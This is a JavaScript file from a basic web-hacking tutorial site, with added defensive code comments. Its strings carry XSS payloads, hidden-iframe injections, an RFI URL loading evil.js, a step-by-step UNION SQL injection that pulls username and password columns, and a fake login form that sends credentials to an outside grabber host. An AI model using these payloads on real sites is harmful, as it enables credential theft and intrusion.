var mainCon = "<p>We have finished transferring most of the tutorials over from the old ghost site and have ported them into our new web interface. The tutorials are deliberately very basic so that you can get a grasp of the fundamentals. Over time we will start adding advanced techniques such as the use of egg hunters. We will also be expanding over the coming weeks to include tutorials for gathering information and the use of different tools such as rpcclient and nmap. Until then, to enjoy our basic tutorials, click one of the links above to view the content.</p>";

var xss = "<h2>Cross Site Scripting</h2><p>Cross site scripting has been haunting the web for many years. Through the use of XSS an attacker can inject code into a web page that can do many different things. Examples include releasing malicious code, credential stealing, forgery, defacement, and many other things. The use of XSS has no limits. Cookie poisoning, SQL injection and other web-based languages combined with XSS have made this type of attack very easy to perform. Here are some examples:</p><br /><h3>Basic:</h3><p>&lt;script&gt;alert('xss');&lt;/script&gt;<br />&lt;script&gt;document.write(document.vulnerable='true');&lt;/script&gt;<br />&lt;img src=javascript:alert('xss');&gt;</p><br /><br /><h3>Filter Evasion and Encoding:</h3><p>Many times obfuscation of the injection attack will need to be performed. I recommend grabbing the Firefox add-on HackBar; it comes with many built-in tools, including an encoding tab.<br />Here are the three examples from above that I have encoded with HackBar's urlencode feature:<br />%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2fscript%3E%0A<br />%3Cscript%3Edocument.write%28document.vulnerable%3D%22true%22%29%3B%3C%2fscript%3E<br />%3Cimg%20src%3Djavascript%3Aalert%28%27xss%27%29%3B%3E</p><br /><br /><h3>XSS through CSS:</h3><p>Internet Explorer makes it possible to perform Cross Site Scripting through CSS with the use of expression wrapping, like so:<br />expres&lt;i&gt;&lt;/i&gt;sion(alert(1));<br /><br />These are just simple examples of XSS and filter evasion; for further reading on evasion techniques, the web is your friend.<br /></p>";
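/*
Added example, not part of the original site's code: output encoding applied to the payloads listed in the XSS text above, showing that the URL-encoded forms decode to the same strings and are neutralized by the same encoder. The names escapeHtml, safeImgSrc, renderComment and demo are hypothetical.

```javascript
// Added example; all function names here are hypothetical.

// Encode the characters that let text leave element content or a quoted attribute.
function escapeHtml(text) {
  var map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, function (ch) { return map[ch]; });
}

// Allow only http(s) and scheme-less URLs in a src attribute value.
function safeImgSrc(url) {
  // Browsers ignore tabs, newlines and leading control characters in a URL,
  // so strip them (and spaces) before looking at the scheme.
  var probe = String(url).replace(/[\u0000-\u0020]/g, "").toLowerCase();
  var scheme = /^([a-z][a-z0-9+.-]*):/.exec(probe);
  if (scheme && scheme[1] !== "http" && scheme[1] !== "https") {
    return "about:blank";
  }
  return escapeHtml(url);
}

// Percent-decode once, as a web framework does for query values,
// then encode at the point of output.
function renderComment(queryValue) {
  var text;
  try {
    text = decodeURIComponent(queryValue);
  } catch (e) {
    text = queryValue; // malformed percent-encoding: treat as literal text
  }
  return "<p>" + escapeHtml(text) + "</p>";
}

// Payloads copied from the tutorial text, plain and URL-encoded.
var PLAIN = "<script>alert('xss');</script>";
var ENCODED = "%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2fscript%3E%0A";

function demo() {
  return {
    plain: renderComment(PLAIN),
    encoded: renderComment(ENCODED),
    img: '<img src="' + safeImgSrc("javascript:alert('xss');") + '">'
  };
}
```
*/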

var review = "<h2>Examining Source Code</h2><table align='center' style='padding-left: 40px;'><tr><td><p>I would like to start this section by saying that sometimes the smallest thing can lead to the biggest problem.<br />We should always start our test by first examining the source code of the target web page. This can be accomplished by right-clicking on the page and clicking on view source. Throughout the source code, be sure to examine the JavaScript and any other files that are linked to the current page for directories where a password file could be stored. If you do not know HTML, JavaScript, PHP, and XML, I suggest that you learn them before you try any of the tutorials on this site. Let's look at a simple example:<br />You are looking through source code and you come across a section that looks similar to this: &lt;script src='../admin/myScript.js'&gt;<br />At this point you know there is a directory called admin in the directory above the one you are in. Let's see if we can view that directory.<br />In the address bar you would go to the last forward slash and type in ../admin/ which should give you a directory listing of the admin directory. This is just a simple example and will be the only one I will cover in this tutorial.</p></td></tr></table>";

var csrf = "<h2>Cross Site Request Forgery</h2><p>CSRF is a way that an attacker can cause the victim to exploit an XSS vulnerability on a different website through a link or possibly an email without the victim knowing. Posting a link or a picture in a blog that the victim opens, which then executes a command to inject code into another web site, is a basic form of CSRF. Here is an example:<br />&lt;img src='http://vulnWebSite.com/index.php?command to execute'&gt;<br /><br />This can be a very good way to spread malware without detection by embedding the code into an XSS-vulnerable site. Once a user logs in the command will be executed, and the server logs will reflect that the last user that was logged in is the one that is spreading the malware. More information can be found on the OWASP web site.</p>";

var iframe = "<h2>Iframe Injection</h2><p>Realistically, Iframe Injection is a form of XSS, well, XSS and RFI. The uses of this type of attack can vary; a while ago it was one of the main types of attacks on Facebook. An attacker would add a friend, add a few comments to the page, and then inject a hidden iframe that could be used for a few things: credential stealing, malware injection, defacement, adding friends from that person's friends list, etc. To elaborate, there are a few ways to make an iframe invisible to the browser; here are some other examples.<br />&lt;iframe src='http://www.malicious-site.com' height='0' width='0'&gt;&lt;/iframe&gt;<br />&lt;iframe src='http://www.malicious-site.com' style='visibility: hidden'&gt;&lt;/iframe&gt;<br />Basic DoS example to kick a user off of the site; of course this is simulated and the cookie probably would not be set as user=someusername<br />&lt;iframe src='&lt;script&gt;void(document.cookie=user='DdOSD')&lt;/script&gt;'height='0' width='0'&gt;&lt;/iframe&gt;<br /><br />The use of iframes is limited to the user's imagination, and there are many tutorials online that will help aid this documentation.</p>";

var flash = "<h2>Flash Parameter Injection</h2><p>Flash is found all over the web. There are many different ways to inject code into Flash parameters, and many different ways to use each of them. I will not go into all of the different injection types, but here are a few.<br /><b>Injection through HTML with XSS -</b> mymovie.swf?vulnerableVariable=javascript: alert('Xss Test')<br /><b>Injection through swf loading as parameter through DOM -</b> http://vulnerableFlash.com#&amp;glVar=javascript: alert('xss')<br /><br />For other references about FPI please do further research; there are many good examples on the OWASP website <a href='http://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project'>Here</a>, along with what the vulnerable code looks like.<br /><br />The best way to find holes in a Flash application is to decompile it. This can be achieved by visiting the application online, then grabbing it from your temporary internet files (yes, it has already been downloaded). Once you have the file you can use a decompiler to view the ActionScript to find calls that are made outside of the application. The best advice is to learn some ActionScript if you do not already know it; Flash is everywhere and not going away anytime soon.<br /><br />Flash logins are a huge no-no! If you find one, chances are the password is embedded in it or in a file very close by.</p>";

var code = "<h2>Code Injection and Session Hijacking</h2><p>Code injection can be performed in many different ways; one of my favorites is through misconfigured servers that allow URL file access. Code can be injected this way through the use of RFI, which I cover in a different document. One of the most basic ways that code injection can be used is through cookie tampering. Cookie tampering is very easy to perform, and authentication forgery with it is even easier. Along with cookie tampering and cookie stealing comes session hijacking. Session hijacking is again pretty easy to perform: someone clicks a link the attacker posts and their credentials are stolen. In essence clickjacking is performed the same way: someone clicks a link in their or in a flash application and they are redirected to a page that can steal their credentials, inject their computer with malware, a backdoor, or possibly even command injection.<br /><br />Let's take a deeper look at code injection, shall we? To start, injecting code into a cookie is performed with the void operator at the beginning of the script, like so:<br />javascript: void(document.cookie='user=admin');<br />This is done through the address bar. If we want to expand a bit, let's take it to the next level. If a vulnerable PHP application is found we can inject code directly into the tag in the same manner. For example:<br />javascript: void(document.forms[0].vuln = document.write('&lt;script&gt;alert(document.vulnerable='true')&lt;/script&gt;'));<br />An example of code that could be used in the blog posting on the site for cookie stealing is:<br />admin wrote: Please must login to view this posting<br />&lt;input type='text' name='uname' /&gt;<br />&lt;input type='password' name='pass' /&gt;<br />&lt;input type='submit' value='Login' onclick='var phish=new Image();phish.src='http://your-javascript-grabber.com&x='+this.form.username.value+'&y='this.form.password.value;' /&gt;<br /></p>";

var sql = "<h2>SQL Injection</h2><p>SQL injection is a way to get information from a database, log in as an authenticated user, or even delete records in a database. SQL injection can be performed on SQL and MySQL servers. Many times, to find the vulnerable server, an attacker will perform simple injections, then escalate to more complex ones. Let's start with an example URL and SQL injection.<br />Example:<br />http://injectable-site.com?page=1<br />We start by adding a simple single quote at the end like so:<br />http://injectable-site.com?page=1'<br />or<br />http://injectable-site.com?page=1 '1=1--<br />What we are looking for is an error code stating that we have an error in our SQL. Now let's move on and find the number of columns in the table.<br />http://injectable-site.com?page=1 order by 1--<br />http://injectable-site.com?page=1 order by 2--<br />http://injectable-site.com?page=1 order by 3--<br />and so on, until the page says 'the page cannot be displayed', or 'unknown column'. This tells us that the number we entered before the page stated this would be our number of columns. Now let's try unions to see if the command works. You would enter the text as follows:<br />http://injectable-site.com?page=1 union all select 1,2,3--<br />Bingo, the numbers printed to the screen, so unions work. Now let's check for column names:<br />http://injectable-site.com?page=1 union all select 1,2,3 from users--<br />If the number is still on the screen the column exists in the table; if not, keep guessing.<br />Now let's see if there is a username and password column:<br />http://injectable-site.com?page=1 union all select 1,2,username,3 from users--<br />http://injectable-site.com?page=1 union all select 1,2,password,3 from users--<br />These are pretty basic examples, and the injections can get a lot more complex. There are many tutorials online that go into further detail about dropping tables, adding users, and many other things.<br />Sometimes injections are a simple 'or 1=1-- into a login form and we get admin or root; a lot of the time we have to work for it.</p>";
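/*
Added example, not part of the original site's code: strict parsing of the numeric page parameter plus a log check that recognises the probe sequence walked through above (quote, ORDER BY counting, UNION SELECT). The request log is constructed sample data and the names parsePageId, classify and summarize are hypothetical; the underlying flaw is still fixed by passing the parsed value to a parameterized query.

```javascript
// Constructed sample requests: [client address, raw value of ?page=].
var SAMPLE_LOG = [
  ["198.51.100.4", "1"],
  ["203.0.113.7", "1'"],
  ["203.0.113.7", "1%20order%20by%201--"],
  ["203.0.113.7", "1%20order%20by%202--"],
  ["203.0.113.7", "1%20order%20by%203--"],
  ["203.0.113.7", "1%20union%20all%20select%201,2,3--"]
];

// The page id is an integer, so accept digits only and reject everything else.
function parsePageId(raw) {
  if (typeof raw !== "string" || !/^[0-9]{1,9}$/.test(raw)) return null;
  return Number(raw);
}

// Heuristic signatures for the probes described in the tutorial text.
var PROBES = [
  { name: "quote-or-comment", re: /'|--/ },
  { name: "order-by-enumeration", re: /\border\s+by\s+\d+/i },
  { name: "union-select", re: /\bunion\s+(all\s+)?select\b/i }
];

// Decode the value the way the server would, then list matching probe names.
function classify(rawValue) {
  var value;
  try {
    value = decodeURIComponent(rawValue.replace(/\+/g, " "));
  } catch (e) {
    return ["malformed-encoding"];
  }
  return PROBES.filter(function (p) { return p.re.test(value); })
               .map(function (p) { return p.name; });
}

// Count probe hits per client so an enumeration run stands out from noise.
function summarize(log) {
  var byClient = {};
  log.forEach(function (entry) {
    var hits = classify(entry[1]);
    if (hits.length === 0) return;
    var seen = byClient[entry[0]] || (byClient[entry[0]] = {});
    hits.forEach(function (name) { seen[name] = (seen[name] || 0) + 1; });
  });
  return byClient;
}
```
*/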

var rfi = "<h2>RFI &amp; LFI</h2><p>Local File Includes are an easy way for an attacker to view files on a server that were not meant to be viewed or retrieved. Again, through a misconfigured server and bad coding, an attacker can view local files in the current page. Here's an example of what an LFI attack might look like:<br />http://somesite.com?page=pass.txt<br />This is a very simple example of how this type of attack can be implemented. There are many different ways that someone could use this type of attack; another example is using XSS where pass.txt is to try and inject code on the page.<br /><br />Remote File Includes can be used for just about every variation of XSS, Code Injection, Session Hijacking, and many others. An RFI attack might look like this:<br />http://somesite.com?page=http://www.malicious.site.com/evil.js<br /><br />I have heard RFI called Code Injection; this can be a true statement if implemented correctly through the use of XSS. RFI is possible through a misconfigured server and bad coding. The server allows URL file access and the code leaves a query string empty for a page or file include; this is true for both RFI and LFI.</p>";
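/*
Added example, not part of the original site's code: the include parameter resolved through a fixed allowlist, so the LFI and RFI request values shown above never reach a file or URL loader. The page table and the names PAGES, resolvePage and describe are hypothetical.

```javascript
// Hypothetical page table: the only files the ?page= parameter may select.
var PAGES = {
  home: "pages/home.html",
  about: "pages/about.html",
  contact: "pages/contact.html"
};

// Label a rejected value for logging; the label never influences what is loaded.
function describe(param) {
  var v = String(param);
  try {
    v = decodeURIComponent(v);
  } catch (e) {
    return "malformed-encoding";
  }
  // A scheme prefix or protocol-relative form means a remote include attempt.
  if (/^[a-z][a-z0-9+.-]*:/i.test(v) || v.indexOf("//") === 0) return "remote-url";
  // A ".." path segment means an attempt to climb out of the page directory.
  if (/(^|[\\/])\.\.([\\/]|$)/.test(v)) return "path-traversal";
  return "unknown-page";
}

// Map the parameter to a file by exact key lookup; fall back to the home page.
function resolvePage(param) {
  // hasOwnProperty keeps inherited keys such as "constructor" from matching.
  if (typeof param === "string" &&
      Object.prototype.hasOwnProperty.call(PAGES, param)) {
    return { ok: true, file: PAGES[param] };
  }
  return { ok: false, file: PAGES.home, reason: describe(param) };
}

// Request values taken from the tutorial text, plus one encoded traversal
// constructed for this example.
function demo() {
  return [
    "about",
    "pass.txt",
    "http://www.malicious.site.com/evil.js",
    "../admin/",
    "..%2F..%2Fetc%2Fpasswd"
  ].map(resolvePage);
}
```
*/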

var exp = "<h2>Exploit Development</h2><p>We are currently working on this section and it will be done in a couple of weeks.</p>";

var ref = "<h2>References</h2><p>This section is a collection of websites that are good for further reading on topics we discuss. Over time we will be adding links to other web sites as we find them.<br /><br /><br />1) <a href='http://www.owasp.org'>Owasp</a><br />2) <a href='http://www.xssed.com'>Xssed.com</a><br />3) <a href='http://ha.ckers.org/xss.html'>ha.ckers.org</a><br />4) <a href='http://www.irongeek.com'>Iron Geek dot com</a><br />5) <a href='http://www.exploit-db.com'>Exploit DB</a><br />6) <a href='http://www.ethicalhacker.net'>Ethical Hacker Network</a><br />7) <a href='http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training'>Metasploit Unleashed</a></p>";
// Map each navigation link id to the HTML string it displays.
var sections = {
  xss: xss, review: review, csrf: csrf, iframe: iframe, flash: flash,
  code: code, sql: sql, rfi: rfi, exp: exp, ref: ref
};

$(document).ready(function () {
  // Show the landing text on first load.
  $("#tutCon").html(mainCon);

  // For every link: fade the old content out, swap in the new section
  // once the fade-out has finished, then fade back in.
  $.each(sections, function (id, content) {
    $("#" + id).click(function () {
      $("#tutCon").fadeOut(1000, function () {
        $(this).html(content).fadeIn(1000);
      });
    });
  });
});
 


